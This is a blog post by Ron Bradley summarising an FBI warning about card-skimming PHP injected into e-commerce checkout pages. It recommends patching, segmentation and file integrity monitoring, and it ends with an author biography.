Blogpost

FIM (File Integrity Monitoring): Protecting Customer’s Credit Card Data

By Ron Bradley
June 1, 2022

There’s FOMO (Fear of Missing Out) and then there’s FIM (File Integrity Monitoring). You do not want to miss out on understanding what FIM is all about and why the FBI (Federal Bureau Of Investigation) is concerned.

The FBI Cyberdivision recently released a Flash Report reporting that cyber actors are unlawfully scraped credit card data from US business’ online checkout pages. These bad actors have also been injecting malicious PHP Hypertext Preprocessor (PHP) code into commerce websites’ checkout pages. The scraped data has been sent to an actor-controlled server that spoofed a legitimate card processing server.

To mitigate the threat these actors pose by compromising US business online checkout pages to steal credit card information, the FBI recommends that companies with checkout pages:

  • Update and patch all systems, to include operating systems, software, and any third party code running as part of your website.
  • Change default login credentials on all systems.
  • Monitor requests performed against your e-commerce environment to identify possible malicious activity.
  • Segregate and segment network systems to limit how easily cyber criminals can move from one to another.
  • Secure all websites transferring sensitive information by using secure socket layer (SSL) protocol.

In addition, I suggest running File Integrity Monitoring (FIM) technology to monitor and detect any file changes that could indicate a cyberattack. Also known as change monitoring, FIM examines files to see if and when they change, and by how and who.

If you are running a website, especially one which transacts funds, and if you do not have File Integrity Monitoring (FIM) implemented, I do not want to shop on your website.  Furthermore, you are going to get pummeled by bad actors because you do not have your house in order!

It is a well-known fact credit card data has always been one of the crown jewels for fraudsters. Remember magecart attacks? And GraphQL API authoratization?

It’s fascinating to me when a business has card data compromised while battle tested measures could easily have been put in place.  Understanding the technical controls your organization and associated Nth parties have in place to defend against fundamental attacks is an imperative in the world of ecommerce.

 

 

Author:

Ron Bradley

Ron Bradley has been involved with Shared Assessments in some capacity for over 15 years. Notably, Bradley wrote some of the very first questions for the Standardized Information Gathering (SIG) Questionnaire. In this course of time, his hair has transitioned from an afro to his current distinguished style.

With a depth of experience building TPRM programs in financial services (Bank of America) and manufacturing (Reynolds, Trane Technologies), Ron understands how cultures and organizations drive the supply chain and third party process. As Vice President, Ron strives to use his extensive knowledge of Third Party Risk Management to help organizations build programs that realize the full potential of the Shared Assessments toolkit.

Ron’s experience in Europe, Asia and South America has allowed him to assess different vendor environments and to build Third Party Risk Management operations from the ground up across the world. Ron is an expert in risk in the manufacturing environment, Operational Technology, and Operational IoT.

Ron lives in Charlotte, North Carolina, and takes frequent trips to Scottsdale, Arizona. He loves golf, travel, and his Big Green Egg, which brings the people around Ron excessive quantities of love, joy, and happiness. Ron’s 24-year-old daughter and his famed sister Kathleen Bradley (first black game hostess!) bring him great delight.

Connect with Ron on LinkedIn or by email.